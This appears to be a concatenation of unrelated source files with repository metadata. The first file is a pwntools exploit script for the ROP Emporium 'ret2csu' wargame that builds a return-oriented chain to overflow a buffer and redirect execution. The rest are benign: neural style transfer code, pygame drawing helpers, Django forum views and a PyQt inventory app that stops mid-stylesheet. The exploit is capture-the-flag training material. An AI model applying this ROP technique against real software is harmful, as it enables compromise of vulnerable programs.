f3bd71eae8ad16a999273e80931b3fa668954546 | 9785b5c8b997bc0241e8520b77bc7078d4c29029 | /wargames/ropemporium/x64/ret2csu/exp.py | 2bb340a347e37a7b64c6c89e4027cfb4510717dc | [] | no_license | lucyoa/ctfs | 4619571201bece8d7a6545f0cdc8291c153b6ef2 | 0726ee26052eabc5ee854fd976d0905d40668e8d | refs/heads/master | 2020-07-31T01:49:00.736206 | 2020-06-25T19:46:53 | 2020-06-25T19:46:53 | 210,439,562 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
exe = context.binary = ELF('./ret2csu')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
tbreak main
continue
'''.format(**locals())
# -- Exploit goes here --
io = start()
io.recvuntil("> ")
payload = (
b"A" * 40 +
p64(0x40089a) +
p64(0x0) + # rbx
p64(0x1) + # rbp
p64(0x600e38) + # r12
p64(0x41) + # r13
p64(0x41) + # r14
p64(0xdeadcafebabebeef) + # r15
p64(0x400880) +
p64(0x0) * 7 +
p64(exe.sym.ret2win)
)
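# Sketch of why the chain works (addresses are from this challenge binary and
# should be re-checked in a disassembler): 0x40089a is the pop-tail of
# __libc_csu_init, which pops rbx, rbp, r12-r15; 0x400880 is its companion
# gadget, which typically moves those registers into rdx/rsi/edi and does
# `call [r12 + rbx*8]`. With rbx=0 and r12 pointing at a harmless function
# pointer (0x600e38), the call returns cleanly, the seven pops that follow
# are padded with zeros, and execution falls through to ret2win with
# 0xdeadcafebabebeef already staged as the third argument.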
io.sendline(payload)
io.interactive()
| [
"[email protected]"
] | |
4e44d40a6908298df40e0b8a96bd8682f578f45c | 76f996b26221344213c099db096c60316f9b45c2 | /supervised_learning/0x0C-neural_style_transfer/5-neural_style.py | 7e7339795a277b66a18f783374aa45da1838e270 | [] | no_license | Nzparra/holbertonschool-machine_learning | 8c61e40c3a6471d52bdf2bbcf4e7ae3c029d3c8b | 9ff78818c132d1233c11b8fc8fd469878b23b14e | refs/heads/master | 2023-04-06T10:48:01.263608 | 2021-04-20T17:34:33 | 2021-04-20T17:34:33 | 279,482,215 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,709 | py | #!/usr/bin/env python3
"""contains the NST class"""
import numpy as np
import tensorflow as tf
class NST:
"""
NST class performs tasks for neural style transfer
"""
style_layers = ['block1_conv1', 'block2_conv1',
'block3_conv1', 'block4_conv1', 'block5_conv1']
content_layer = 'block5_conv2'
def __init__(self, style_image, content_image, alpha=1e4, beta=1):
"""
constructor
:param style_image: image used as a style reference,
stored as a numpy.ndarray
:param content_image: image used as a content reference,
stored as a numpy.ndarray
        :param alpha: weight for the content cost
:param beta: weight for style cost
"""
if type(style_image) is not np.ndarray \
or len(style_image.shape) != 3 \
or style_image.shape[2] != 3:
msg = 'style_image must be a numpy.ndarray with shape (h, w, 3)'
raise TypeError(msg)
if type(content_image) is not np.ndarray \
or len(content_image.shape) != 3 \
or content_image.shape[2] != 3:
msg = 'content_image must be a numpy.ndarray with shape (h, w, 3)'
raise TypeError(msg)
if not isinstance(alpha, (int, float)) or alpha < 0:
msg = 'alpha must be a non-negative number'
raise TypeError(msg)
if not isinstance(beta, (int, float)) or beta < 0:
msg = 'beta must be a non-negative number'
raise TypeError(msg)
tf.enable_eager_execution()
self.style_image = self.scale_image(style_image)
self.content_image = self.scale_image(content_image)
self.alpha = alpha
self.beta = beta
self.load_model()
self.generate_features()
@staticmethod
def scale_image(image):
"""
:param image: numpy.ndarray of shape (h, w, 3)
containing the image to be scaled
:return:
"""
if type(image) is not np.ndarray \
or len(image.shape) != 3 \
or image.shape[2] != 3:
msg = 'image must be a numpy.ndarray with shape (h, w, 3)'
raise TypeError(msg)
h, w, c = image.shape
if w > h:
w_new = 512
h_new = int(h * 512 / w)
else:
h_new = 512
w_new = int(w * 512 / h)
dim = (h_new, w_new)
image = image[tf.newaxis, ...]
image = tf.image.resize_bicubic(image, dim, align_corners=False)
image = tf.math.divide(image, 255)
image = tf.clip_by_value(image, clip_value_min=0, clip_value_max=1)
return image
def load_model(self):
""" loads the model for neural style transfer """
vgg_pre = tf.keras.applications.vgg19.VGG19(include_top=False,
weights='imagenet')
custom_objects = {'MaxPooling2D': tf.keras.layers.AveragePooling2D}
vgg_pre.save("base_model")
vgg = tf.keras.models.load_model("base_model",
custom_objects=custom_objects)
for layer in vgg.layers:
layer.trainable = False
style_outputs = \
[vgg.get_layer(name).output for name in self.style_layers]
content_outputs = vgg.get_layer(self.content_layer).output
model_outputs = style_outputs + [content_outputs]
self.model = tf.keras.models.Model(vgg.input, model_outputs)
@staticmethod
def gram_matrix(input_layer):
"""
:param input_layer: an instance of tf.Tensor or
            tf.Variable of shape (1, h, w, c) containing the
layer output whose gram matrix should be calculated
:return:
"""
e = 'input_layer must be a tensor of rank 4'
if not isinstance(input_layer, (tf.Tensor, tf.Variable)) \
or len(input_layer.shape) != 4:
raise TypeError(e)
channels = int(input_layer.shape[-1])
a = tf.reshape(input_layer, [-1, channels])
n = tf.shape(a)[0]
gram = tf.matmul(a, a, transpose_a=True)
gram = tf.expand_dims(gram, axis=0)
return gram / tf.cast(n, tf.float32)
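    # In formula form (matching the reshape/matmul above): with F the
    # (h*w, c) matrix of activations, the method returns G = F^T F / (h*w),
    # expanded to shape (1, c, c) so it lines up with the batched layer
    # outputs.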
def generate_features(self):
""" extracts the features used to calculate neural style cost"""
vgg19 = tf.keras.applications.vgg19
content_image_input = vgg19.preprocess_input(self.content_image * 255)
style_image_input = vgg19.preprocess_input(self.style_image * 255)
content_img_output = self.model(content_image_input)
style_img_output = self.model(style_image_input)
list_gram = []
for out in style_img_output[:-1]:
list_gram = list_gram + [self.gram_matrix(out)]
self.gram_style_features = list_gram
self.content_feature = content_img_output[-1]
def layer_style_cost(self, style_output, gram_target):
"""
:param style_output: tf.Tensor of shape (1, h, w, c)
containing the layer style output of the generated image
:param gram_target: tf.Tensor of shape (1, c, c)
the gram matrix of the target style output for that layer
:return:
"""
err = 'style_output must be a tensor of rank 4'
if (not isinstance(style_output, (tf.Tensor, tf.Variable)) or
len(style_output.shape) != 4):
raise TypeError(err)
c = int(style_output.shape[-1])
err = 'gram_target must be a tensor of shape [1, {}, {}]'.format(c, c)
if (not isinstance(gram_target, (tf.Tensor, tf.Variable)) or
gram_target.shape != (1, c, c)):
raise TypeError(err)
gram_style = self.gram_matrix(style_output)
return tf.reduce_mean(tf.square(gram_style - gram_target))
def style_cost(self, style_outputs):
"""
calculate the style cost:
:param style_outputs: list of tf.Tensor style outputs
for the generated image
:return: style cost
"""
my_length = len(self.style_layers)
err = \
'style_outputs must be a list with a length of {}'. \
format(my_length)
if (not type(style_outputs) is list
or len(self.style_layers) != len(style_outputs)):
raise TypeError(err)
weight = 1.0 / float(my_length)
style_cost = 0.0
for img_style, target_style in \
zip(style_outputs, self.gram_style_features):
layer_cost = self.layer_style_cost(img_style, target_style)
style_cost = style_cost + weight * layer_cost
return style_cost
| [
"[email protected]"
] | |
ba4699fe8998ae1ce46d88e29cc15d35f408be1a | 77139a58311a1c729b0d16f591e695e9d92c3dbd | /gfx.py | 344f361cdef414e3cd10d1a5526816b0ee616192 | [] | no_license | funnybr0ther/python_evolution | 727471f36a53c90e683329345a56dde59e5c653f | d139f3db786fb20f3385218573e44c28295bd8ec | refs/heads/master | 2020-06-11T18:56:16.269804 | 2019-10-15T17:54:22 | 2019-10-15T17:54:22 | 194,053,809 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,317 | py | from numpy import *
import pygame as pg
import os
import sys
def background():
filename=input("Map?")
try:
file=open(os.path.join(sys.path[0], filename), "r")
lines=[]
for line in file:
lines.append(line)
terrainSize=len(lines)
terrain = empty((terrainSize,terrainSize),dtype=int)
for i in range(0,terrainSize):
for j in range(0,terrainSize):
terrain[i][j]=int(lines[i][j])
return terrain,terrainSize
except IOError:
print("File does not exist")
return background()
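# Expected map file format (inferred from the parsing above): a square grid
# of digits 0-5, one row per line, e.g. a 3x3 map:
#     012
#     345
#     210
# Each digit indexes color_map in draw_bg below.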
def draw_bg(terrain,win,terrainSize):
    color_map = {
        0: (255, 0, 0),
        1: (240, 106, 16),
        2: (247, 255, 0),
        3: (68, 255, 0),
        4: (0, 222, 255),
        5: (0, 0, 255),
    }
pg.draw.rect(win,(0,0,0),pg.Rect(0,0,800,800))
for i in range(0,terrainSize):
for j in range(0,terrainSize):
pg.draw.rect(win,color_map[terrain[j][i]],pg.Rect(i*(800/terrainSize),j*(800/terrainSize),800/terrainSize,800/terrainSize))
def draw_food(food_list,win):
for food in food_list:
pg.draw.circle(win,(247,0,255),(food.x,food.y),food.radius)
def draw_zomb(zombie_list,win):
for zomb in zombie_list:
pg.draw.rect(win,(0,0,0),pg.Rect(zomb.x,zomb.y,10,10)) | [
"[email protected]"
] | |
20068a2762fb02a1ceafe32e239741bcab2ae28d | 28b9adc46eb9bb7616c4f74fe29f9a3417f2f963 | /10/SIM_PKL/forum/views.py | 3e95a455633ea9ca9db03dd67f0faa36865d7972 | [] | no_license | mohamad1213/SIMPKL | ca0a6dafb97b494e5edf9276e358f800eee808e1 | e6ef5d6b8a5c18c85067314a3664bf43959a0370 | refs/heads/master | 2023-01-04T18:27:06.306534 | 2020-11-03T06:53:50 | 2020-11-03T06:53:50 | 297,674,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,716 | py | from django.shortcuts import render, redirect
from django.contrib.auth.models import User
from mahasiswa.models import Pkl
from . import models, forms
from django.contrib import messages
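# Terminology note for the Indonesian identifiers kept as-is below:
# dosen = lecturer, staf = staff, mhs/mahasiswa = student, komen = comment,
# balas = reply, posting = post. Each view exists in three role-specific
# variants that differ only in the redirect prefix (/forumd, /forums, /forum).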
def index_dosen(req):
tasks = models.Forum.objects.all()
form_input = forms.ForumForm()
if req.POST:
form_input = forms.ForumForm(req.POST, req.FILES)
if form_input.is_valid():
form_input.instance.owner = req.user
form_input.save()
            messages.success(req, 'Data has been added.')
return redirect('/forumd/')
return render(req, 'forumd/index.html',{
'data': tasks,
'form' : form_input,
})
def index_staf(req):
tasks = models.Forum.objects.all()
form_input = forms.ForumForm()
if req.POST:
form_input = forms.ForumForm(req.POST, req.FILES)
if form_input.is_valid():
form_input.instance.owner = req.user
form_input.save()
            messages.success(req, 'Data has been added.')
return redirect('/forums/')
return render(req, 'forums/index.html',{
'data': tasks,
'form' : form_input,
})
def index_mhs(req):
forum = req.user.mahasiswa.first().nama_mitra
return redirect(f'/forum/{forum.id}')
def delete_forum(req, id):
models.Forum.objects.filter(pk=id).delete()
    messages.success(req, 'Data has been deleted.')
return redirect('/forums/')
def detail_forum(req, id):
forum = models.Forum.objects.filter(pk=id).first()
form_input = forms.PostingForm()
form_komen = forms.KomenForm()
form_balas = forms.BalasForm()
if req.POST:
form_input = forms.PostingForm(req.POST, req.FILES)
if form_input.is_valid():
form_input.instance.owner = req.user
form_input.instance.forum = forum
form_input.save()
return redirect(f'/forums/{id}')
return render(req, 'forums/detail.html', {
'form': form_input,
'form_komen': form_komen,
'form_balas': form_balas,
'data': forum,
})
def detail_forum_d(req, id):
forum = models.Forum.objects.filter(pk=id).first()
form_input = forms.PostingForm()
form_komen = forms.KomenForm()
form_balas = forms.BalasForm()
if req.POST:
form_input = forms.PostingForm(req.POST, req.FILES)
if form_input.is_valid():
form_input.instance.owner = req.user
form_input.instance.forum = forum
form_input.save()
return redirect(f'/forumd/{id}')
return render(req, 'forumd/detail.html', {
'form': form_input,
'form_komen': form_komen,
'form_balas': form_balas,
'data': forum,
})
def detail_forum_mhs(req, id):
forum = models.Forum.objects.filter(pk=id).first()
komen = models.Komen.objects.filter(pk=id).first()
form_input = forms.PostingForm()
form_komen = forms.KomenForm()
form_balas = forms.BalasForm()
if req.POST:
form_input = forms.PostingForm(req.POST, req.FILES)
if form_input.is_valid():
form_input.instance.owner = req.user
form_input.instance.forum = forum
form_input.save()
return redirect(f'/forum/{id}')
return render(req, 'forum/detail.html', {
'form': form_input,
'form_komen': form_komen,
'form_balas': form_balas,
'data': forum,
})
def delete_posting(req, id, id_posting):
models.Posting.objects.filter(pk=id_posting).delete()
messages.success(req, 'data telah di hapus.')
return redirect(f'/forums/{id}')
def delete_posting_d(req, id, id_posting):
models.Posting.objects.filter(pk=id_posting).delete()
messages.success(req, 'data telah di hapus.')
return redirect(f'/forumd/{id}')
def delete_posting_mhs(req, id, id_posting):
models.Posting.objects.filter(pk=id_posting).delete()
messages.success(req, 'data telah di hapus.')
return redirect(f'/forum/{id}')
def delete_komen(req, id, id_komen):
models.Komen.objects.filter(pk=id_komen).delete()
messages.success(req, 'data telah di hapus.')
return redirect(f'/forums/{id}/komen')
def delete_komen_d(req, id, id_komen):
models.Komen.objects.filter(pk=id_komen).delete()
messages.success(req, 'data telah di hapus.')
return redirect(f'/forumd/{id}/komen')
def delete_komen_mhs(req, id, id_komen):
models.Komen.objects.filter(pk=id_komen).delete()
messages.success(req, 'data telah di hapus.')
return redirect(f'/forum/{id}/komen')
def staf_komen(req, id, id_posting):
posting = models.Posting.objects.filter(pk=id_posting).first()
if req.POST:
form_komen = forms.KomenForm(req.POST, req.FILES)
if form_komen.is_valid():
form_komen.instance.pengguna = req.user
form_komen.instance.posting = posting
form_komen.save()
return redirect(f'/forums/{id}')
def dosen_komen(req, id, id_posting):
posting = models.Posting.objects.filter(pk=id_posting).first()
if req.POST:
form_komen = forms.KomenForm(req.POST, req.FILES)
if form_komen.is_valid():
form_komen.instance.pengguna = req.user
form_komen.instance.posting = posting
form_komen.save()
return redirect(f'/forumd/{id}')
def mhs_komen(req, id, id_posting):
posting = models.Posting.objects.filter(pk=id_posting).first()
if req.POST:
form_komen = forms.KomenForm(req.POST, req.FILES)
if form_komen.is_valid():
form_komen.instance.pengguna = req.user
form_komen.instance.posting = posting
form_komen.save()
return redirect(f'/forum/{id}') | [
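# A sketch of the URLconf these views assume (hypothetical -- the project's
# real urls.py is not included in this file). The hard-coded redirects above
# ('/forum/<id>', '/forums/<id>', '/forumd/<id>', ...) only resolve if routes
# along these lines exist:
#
#   urlpatterns = [
#       path('forums/', views.index_staf),
#       path('forums/<int:id>', views.detail_forum),
#       path('forums/<int:id>/komen/<int:id_posting>', views.staf_komen),
#       path('forumd/', views.index_dosen),
#       path('forum/<int:id>', views.detail_forum_mhs),
#   ]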
"[email protected]"
] | |
cac71e3ed2732220d743d9ceb68cf58d88e39b17 | dea22cf0de22eb7a5574c3ebe9cc239026fcd479 | /core/admin.py | 626df3be91a31a7eb1d1557b4d2c7a0c79bcdc38 | [] | no_license | Vadim4ik1/iswork | b816125978c8029a80b76b07ce5a60c07ebcdb6c | 9dbf8bd0dadb8de607f89438dc997797f03faf5e | refs/heads/master | 2022-06-09T05:22:25.741647 | 2020-05-08T20:18:04 | 2020-05-08T20:18:04 | 262,420,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | from django.contrib import admin
from core.models import Articles
# Register your models here.
admin.site.register(Articles) | [
"[email protected]"
] | |
a496431f62a75c583cfcf11cd8f506b10c9e08f1 | cebc274c288b463a864fa000ab48d444cd48c12b | /assign4/sensor/migrations/0001_initial.py | 19c25a41ccb7bb15e7b17ca2f8e09c192475d50c | [] | no_license | sejin-k/np_TeamProject7 | f1e6ca0249a0e0d436305b1309ef803ecd2f92d8 | 5941e279f7c59176cc03ef97b799eca34a0291b8 | refs/heads/master | 2020-05-30T22:55:33.933508 | 2019-06-03T13:48:44 | 2019-06-03T13:48:44 | 190,004,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | # Generated by Django 2.0.13 on 2019-06-03 08:40
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Distance',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('distance', models.CharField(max_length=255)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
options={
'verbose_name_plural': 'sensor',
},
),
]
| [
"[email protected]"
] | |
2a1914cd41a70291178f9256cf0eac382fbb518c | 388043c361e9eb791eda2d647d9b1ea90666f66e | /loopneverend.py | 3edb5f238e6dff6f5aa5a3dbf0787130403fddbf | [] | no_license | tmuhimbisemoses/doingmathwithpython | ace1c6a1aeea7fa6f723d23c41ac57fe93594faf | 1b09586e9ea4309f0f180262ed53fa5fb5232398 | refs/heads/master | 2021-01-22T09:32:23.581631 | 2017-02-14T22:32:18 | 2017-02-14T22:32:18 | 81,964,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | def fun():
print('Endless loop')
if __name__ == '__main__':
while True:
fun()
answer=input('Do you want to exit (y)')
if answer == 'y':
break | [
"[email protected]"
] | |
a746d64fc4c527f821d092db87462b4d23a89402 | 70df66a1951ee04cd2f601e5ba006c39f25afdf3 | /unique_path2.py | 6ace1a03ffa07bf67082adf1f4f032b79d91c2aa | [] | no_license | ddyuewang/LeetCode_PYTHON | 7293e5401a57987c8b837d04845a4317e392ce7b | 991532d7707abd8ea65314078494f1afb023a55c | refs/heads/master | 2021-06-12T19:44:15.306947 | 2017-01-12T17:56:18 | 2017-01-12T17:56:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,287 | py | class Solution(object):
def uniquePathsWithObstacles(self, obstacleGrid):
"""
:type obstacleGrid: List[List[int]]
:rtype: int
"""
##### v1. solution that save the results
# # get the dimension
# m = len(obstacleGrid)
# n = len(obstacleGrid[0])
# Solution.res = {}
# ### initialization phase - not necessary all 1
# for i in range(n):
# if obstacleGrid[0][i] == 1:
# break;
# Solution.res[(0,i)] = 1
# for i in range(m):
# if obstacleGrid[i][0] == 1:
# break;
# Solution.res[(i,0)] = 1
# return self.dfs(obstacleGrid, m-1, n-1)
# def dfs(self, obstacleGrid, x, y):
# if obstacleGrid[0][0] == 1 or obstacleGrid[x][y] == 1:
# return 0
# if x<0 or y<0:
# return 0
# if x==0 and y==0:
# return 1
# if (x,y) in Solution.res.keys():
# return Solution.res[(x,y)]
# else:
# Solution.res[(x,y)] = self.dfs(obstacleGrid,x-1,y) + self.dfs(obstacleGrid,x,y-1)
# return Solution.res[(x,y)]
######----------------------------------------
# v2. using single list - DP
m = len(obstacleGrid)
n = len(obstacleGrid[0])
#### deal with boundary case
if m == 1 or n == 1:
if 1 not in obstacleGrid[0] and [1] not in obstacleGrid:
return 1
else:
return 0
#### boundary condition
if obstacleGrid[0][0] == 1 or obstacleGrid[m-1][n-1] == 1:
return 0
Solution.res = [0] * n # just use one single list - in n direction
if obstacleGrid[0][0] == 0:
Solution.res[0] = 1
else:
Solution.res[0] = 0
for i in range(m):
if Solution.res[0] != 0 and obstacleGrid[i][0] ==0:
Solution.res[0] = 1
else:
Solution.res[0] = 0
for j in range(1,n):
if (obstacleGrid[i][j] == 0):
Solution.res[j] = Solution.res[j] + Solution.res[j-1]
else:
Solution.res[j] = 0
return Solution.res[n-1] | [
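# Quick sanity check (not part of the original submission): a 3x3 grid with a
# single obstacle in the centre leaves exactly two paths around it.
if __name__ == '__main__':
    grid = [[0, 0, 0],
            [0, 1, 0],
            [0, 0, 0]]
    print(Solution().uniquePathsWithObstacles(grid))  # expected: 2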
"[email protected]"
] | |
76ddb0b846e4b5fe0b12d67b9a390c063bd234f4 | 28e65c98809fddd70ade446c4291961369be9253 | /emrnew/doctor/urls.py | 00dbfc35a4e5bc7c349334177a0068639a4027b8 | [] | no_license | RohiniVasudev/emrnew--2- | d42213f08cc33e40d0f848e4a8d1243e508e6a4d | c2200e9a8cede3939e7b04b767ca97cdd5536cd2 | refs/heads/master | 2023-01-31T21:10:28.288420 | 2020-12-14T22:14:06 | 2020-12-14T22:14:06 | 321,486,037 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | from django.urls import path
from . import views
urlpatterns = [
path('',views.home,name='home'),
path('login',views.login,name="login"),
path('register',views.register,name="register"),
path('login2',views.login2,name="login2"),
path('rcomplete',views.rcomplete,name="rcomplete"),
path('copd',views.copd,name="copd"),
path('lungcancer',views.lungcancer,name='lungcancer'),
path('diabetes',views.diabetes,name='diabetes'),
path('heart',views.heart,name="heart"),
path('predCopd',views.predCopd,name="predCopd"),
path('predict',views.predict,name='predict'),
path('predicDiabetes',views.predicDiabetes,name='predicDiabetes'),
path('predHeart',views.predHeart,name='predHeart'),
path('datafetch',views.datafetch,name="datafetch"),
path('copdesv',views.copdesv,name="copdesv"),
path('lungesv',views.lungesv,name='lungesv'),
path('heartesv',views.heartesv,name='heartesv'),
path('diaesv',views.diaesv,name="diaesv")
] | [
"[email protected]"
] | |
b4f552e81b2541b391b1576e28ec3cc293d2726a | 81add62c05ebf1970babc14856d2284b60b95d24 | /artikli.py | 52ef1d50faa3753373dfb00312b7f4227d0b13e4 | [] | no_license | B4ch0/BP2 | 3c8b7bb0a4d82b35b6884447a78c77041a353a5a | 8a9725b6bd2bcc92452c6a6bcdeccdd600a8ae96 | refs/heads/master | 2022-04-02T03:19:08.226806 | 2020-01-07T19:11:34 | 2020-01-07T19:11:34 | 232,393,343 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 49,727 | py |
from artui import *
import os
import datetime
import artiklidb as ad
import init_db
from PyQt5.QtWidgets import QTabWidget
from PyQt5.QtWidgets import QTableWidget
from PyQt5.QtWidgets import QTableWidgetItem
from PyQt5.QtWidgets import QVBoxLayout
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QFormLayout
from PyQt5.QtWidgets import QLabel
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QLineEdit
from PyQt5.QtWidgets import QListWidget
from PyQt5.QtWidgets import QStackedWidget
from PyQt5.QtWidgets import (QWidget, QPushButton,QMainWindow,
QHBoxLayout, QApplication,QAction,QFileDialog)
import sqlite3
try:
conn = sqlite3.connect('vanreda.db')
c = conn.cursor()
c.execute("""CREATE TABLE artikli (
artikal text NOT NULL,
kolicina integer,
cijena integer,
sifra integer unique,
kategorija integer,
artikal_id integer primary key autoincrement
) """)
conn.commit()
except sqlite3.OperationalError:
print('DB postoji') # table already exists
class Login(QtWidgets.QDialog):
def __init__(self, parent=None):
super(Login, self).__init__(parent)
self.textName = QtWidgets.QLineEdit(self)
self.textName.setPlaceholderText("Radnik...")
self.textName.setStyleSheet("background-color: rgb(255, 255, 255);")
self.textPass = QtWidgets.QLineEdit(self)
self.textPass.setEchoMode(QtWidgets.QLineEdit.Password)
self.textPass.setPlaceholderText("Šifra...")
self.textPass.setStyleSheet("background-color: rgb(255, 255, 255);")
self.buttonLogin = QtWidgets.QPushButton('Prijava', self)
self.buttonLogin.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
self.buttonLogin.clicked.connect(self.artLogin)
layout = QtWidgets.QVBoxLayout(self)
self.setStyleSheet("background-color: rgb(255, 255, 199);")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Normal, QtGui.QIcon.On)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Disabled, QtGui.QIcon.Off)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Disabled, QtGui.QIcon.On)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Active, QtGui.QIcon.Off)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Active, QtGui.QIcon.On)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Selected, QtGui.QIcon.Off)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Selected, QtGui.QIcon.On)
self.setWindowIcon(icon)
layout.addWidget(self.textName)
layout.addWidget(self.textPass)
layout.addWidget(self.buttonLogin)
self.setWindowTitle('"Van Reda"')
def artLogin(self):
username = self.textName.text()
password = self.textPass.text()
connection = sqlite3.connect("vanreda.db")
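# Parameterized query -- safe against SQL injection. 'Pozicija = 1' appears
# to restrict this login screen to a single role; the radnici schema itself
# is not shown here, so that reading is an assumption.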
result = connection.execute("SELECT * FROM radnici WHERE Radnik_ID = ? AND Sifra = ? AND Pozicija =1", (username, password))
if (len(result.fetchall()) > 0):
self.accept()
else: QtWidgets.QMessageBox.warning(
self, 'Greška', 'Neispravni podaci')
class Glavni(QMainWindow):
def __init__(self):
super().__init__()
self.artui = Ui_MainWindow()
self.artui.setupUi(self)
self.setWindowTitle('Artikli "Van Reda"')
self.initUI()
def initUI(self):
self.st = stackedGlavni()
exitAct = QAction(QIcon('slOdustani.png'), 'IZLAZ', self)
exitAct.setStatusTip('IZLAZ')
exitAct.triggered.connect(self.close)
self.statusBar()
toolbar = self.addToolBar('Izlaz')
toolbar.addAction(exitAct)
self.setCentralWidget(self.st)
self.show()
class stackedGlavni(QWidget):
def __init__(self):
super(stackedGlavni, self).__init__()
self.leftlist = QListWidget()
self.leftlist.setStyleSheet("background-color: rgb(255, 255, 255); border: 2px solid #555; border-radius: 2px;")
self.leftlist.setFixedWidth(200)
self.leftlist.setFixedHeight(300)
self.leftlist.insertItem(0, 'DODAJ ARTIKAL')
self.leftlist.insertItem(1, 'IZMJENA ARTIKLA')
self.leftlist.insertItem(2, 'PREGLED ARTIKLA')
self.leftlist.insertItem(3, 'EVIDENCIJA UPISA U BAZU')
self.stack1 = QWidget()
self.stack2 = QWidget()
self.stack3 = QWidget()
self.stack4 = QWidget()
self.dodajUI()
self.stack2UI()
self.stack3UI()
self.stack4UI()
self.Stack = QStackedWidget(self)
self.Stack.addWidget(self.stack1)
self.Stack.addWidget(self.stack2)
self.Stack.addWidget(self.stack3)
self.Stack.addWidget(self.stack4)
hbox = QHBoxLayout(self)
hbox.addWidget(self.leftlist)
hbox.addWidget(self.Stack)
self.setLayout(hbox)
self.leftlist.currentRowChanged.connect(self.display)
self.setGeometry(300,350, 200, 200)
self.show()
def dodajUI(self):
layout = QFormLayout()
self.ok = QPushButton('DODAJ', self)
cancel = QPushButton('PONIŠTI', self)
self.art_name = QLineEdit()
layout.addRow("NAZIV ARTIKLA", self.art_name)
self.art_count = QLineEdit()
layout.addRow("KOLIฤINA", self.art_count)
self.art_cost = QLineEdit()
layout.addRow("CIJENA", self.art_cost)
self.art_code =QLineEdit()
layout.addRow("ล IFRA", self.art_code)
self.artKat = QLineEdit()
layout.addRow("KATEGORIJA", self.artKat)
#self.artInfo.setText("Proba")
#self.artInfo.setGeometry(420,420,47,13)
layout.addWidget(self.ok)
layout.addWidget(cancel)
# self.artInfo.setGeometry(420,420,47,13)
self.art_name.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_name.setFixedWidth(300)
self.art_count.setFixedWidth(200)
self.art_cost.setFixedWidth(200)
self.art_code.setFixedWidth(200)
self.artKat.setFixedWidth(50)
self.art_cost.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_name.setContentsMargins(0,0,0,10)
self.art_count.setContentsMargins(0, 0, 0, 10)
self.art_cost.setContentsMargins(0, 0, 0, 10)
self.art_code.setContentsMargins(0, 0, 0, 10)
self.artKat.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_count.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_code.setStyleSheet("background-color: rgb(255, 255, 255);")
self.ok.setFixedWidth(200)
self.ok.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.ok.setIcon(QtGui.QIcon('slPrijava.png'))
cancel.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
